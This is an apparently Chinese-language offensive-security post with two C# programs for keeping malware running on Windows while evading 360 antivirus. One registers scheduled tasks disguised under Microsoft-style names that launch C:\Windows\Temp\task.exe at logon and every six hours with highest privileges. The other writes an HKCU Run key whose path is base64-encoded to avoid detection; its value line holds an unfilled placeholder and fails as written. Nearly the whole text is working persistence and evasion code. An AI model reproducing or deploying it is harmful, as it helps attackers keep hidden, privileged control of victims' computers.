Bypass360 自启动

通过`Windows Api`绕过360进行权限维持

计划任务

需要一个`Interop.TaskScheduler.dll`

using System;
using System.Diagnostics;
using System.IO;
using System.Security.Principal;
using TaskScheduler;

namespace AddTasks
{
    class Program
    {
        static void Main(string[] args)
        {
            if (!new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator))
            {
                Console.WriteLine("需要管理员权限.");
                Process.GetCurrentProcess().Kill();
            }

            AddTasks("1", _TASK_TRIGGER_TYPE2.TASK_TRIGGER_LOGON, "Microsoft\\1").Run(null);//用户登录自启动
            AddTasks("2", _TASK_TRIGGER_TYPE2.TASK_TRIGGER_TIME, "Microsoft\\2").Run(null);//自定义相隔时间启动
        }

        public static IRegisteredTask AddTasks(string author, _TASK_TRIGGER_TYPE2 runType, string taskPath)
        {
            TaskSchedulerClass t = new TaskSchedulerClass();
            // 连接
            t.Connect(
                serverName: null,//主机名或IP
                user: null,//用户名
                domain: null,//域名
                password: null//密码
                );

            // 获取计划任务目录，\\为根目录
            ITaskFolder folder = t.GetFolder("\\");

            // 设置参数
            ITaskDefinition task = t.NewTask(0);
            task.RegistrationInfo.Author = author;//创建者
            task.RegistrationInfo.Description = "tasks";//描述
            task.Settings.Enabled = true;//是否启用
            //触发方式
            if (runType == _TASK_TRIGGER_TYPE2.TASK_TRIGGER_TIME)
            {
                ITimeTrigger tt = (ITimeTrigger)task.Triggers.Create(_TASK_TRIGGER_TYPE2.TASK_TRIGGER_TIME);
                tt.Repetition.Interval = "PT6H1M";//时间启动方式，每6小时启动一次
                tt.StartBoundary = "2020-04-09T14:27:25";
            }
            else
            {
                task.Triggers.Create(runType);
            }

            // 设置动作
            IExecAction action = (IExecAction)task.Actions.Create(_TASK_ACTION_TYPE.TASK_ACTION_EXEC);
            action.Path = @"C:\Windows\Temp\task.exe";//设置文件目录

            task.Settings.ExecutionTimeLimit = "PT0S"; //运行任务时间超时停止任务吗? PTOS 不开启超时
            task.Settings.DisallowStartIfOnBatteries = false;//只有在交流电源下才执行
            task.Settings.RunOnlyIfIdle = false;//仅当计算机空闲下才执行
            task.Principal.RunLevel = _TASK_RUNLEVEL.TASK_RUNLEVEL_HIGHEST;//管理员权限运行

            IRegisteredTask regTask = folder.RegisterTaskDefinition(
                taskPath,//计划任务路径\\任务计划名称
                task,//此处需要设置任务的名称（name）
                (int)_TASK_CREATION.TASK_CREATE,
                null, //user
                null, //password
                _TASK_LOGON_TYPE.TASK_LOGON_INTERACTIVE_TOKEN,
                ""
                );
            switch (runType)
            {
                case _TASK_TRIGGER_TYPE2.TASK_TRIGGER_LOGON:
                    Console.WriteLine("已写入：" + taskPath);
                    Console.WriteLine("用户登录启动");
                    Console.WriteLine("启动文件路径 -> " + action.Path + "\n\r");
                    break;
                case _TASK_TRIGGER_TYPE2.TASK_TRIGGER_TIME:
                    Console.WriteLine("已写入：" + taskPath);
                    Console.WriteLine("时间启动：每隔6小时1分钟启动一次");
                    Console.WriteLine("启动文件路径 -> " + action.Path + "\n\r");
                    break;
                //case _TASK_TRIGGER_TYPE2.TASK_TRIGGER_DAILY:
                // Console.WriteLine("每天启动一次");
                // break;
                //case _TASK_TRIGGER_TYPE2.TASK_TRIGGER_EVENT:
                // Console.WriteLine("事件启动");
                // break;
                //case _TASK_TRIGGER_TYPE2.TASK_TRIGGER_WEEKLY:
                // Console.WriteLine("");
                // break;
                //case _TASK_TRIGGER_TYPE2.TASK_TRIGGER_MONTHLY:
                // Console.WriteLine("");
                // break;
                //case _TASK_TRIGGER_TYPE2.TASK_TRIGGER_MONTHLYDOW:
                // Console.WriteLine("");
                // break;
                //case _TASK_TRIGGER_TYPE2.TASK_TRIGGER_IDLE:
                // Console.WriteLine("");
                // break;
                //case _TASK_TRIGGER_TYPE2.TASK_TRIGGER_REGISTRATION:
                // Console.WriteLine("");
                // break;
                //case _TASK_TRIGGER_TYPE2.TASK_TRIGGER_BOOT:
                // Console.WriteLine("");
                // break;
                //case _TASK_TRIGGER_TYPE2.TASK_TRIGGER_SESSION_STATE_CHANGE:
                // Console.WriteLine("");
                // break;
                //case _TASK_TRIGGER_TYPE2.TASK_TRIGGER_CUSTOM_TRIGGER_01:
                // Console.WriteLine("");
                // break;
                default:
                    break;
            }
            return regTask;
        }
    }
}

---

注册表

路径HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
键名GetDomain
执行C:\Windows\Temp\task.exe

using Microsoft.Win32;
using System;
using System.Text;

namespace AddRegedit
{
    class Program
    {
        static void Main(string[] args)
        {
            //Console.WriteLine(Convert.ToBase64String(Encoding.Unicode.GetBytes(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Run")));
            //Console.WriteLine(Convert.ToBase64String(Encoding.Unicode.GetBytes(@"C:\Windows\Temp\task.exe")));
            //Console.ReadKey();
            Add();
        }

        public static void Add()
        {
            string addRegPath = Encoding.Unicode.GetString(Convert.FromBase64String("UwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4A"));
            RegistryKey oKey = Registry.CurrentUser.OpenSubKey(addRegPath, true);

            oKey.SetValue("GetDomain", Encoding.Unicode.GetString(Convert.FromBase64String("程序路径")));
        }
    }
}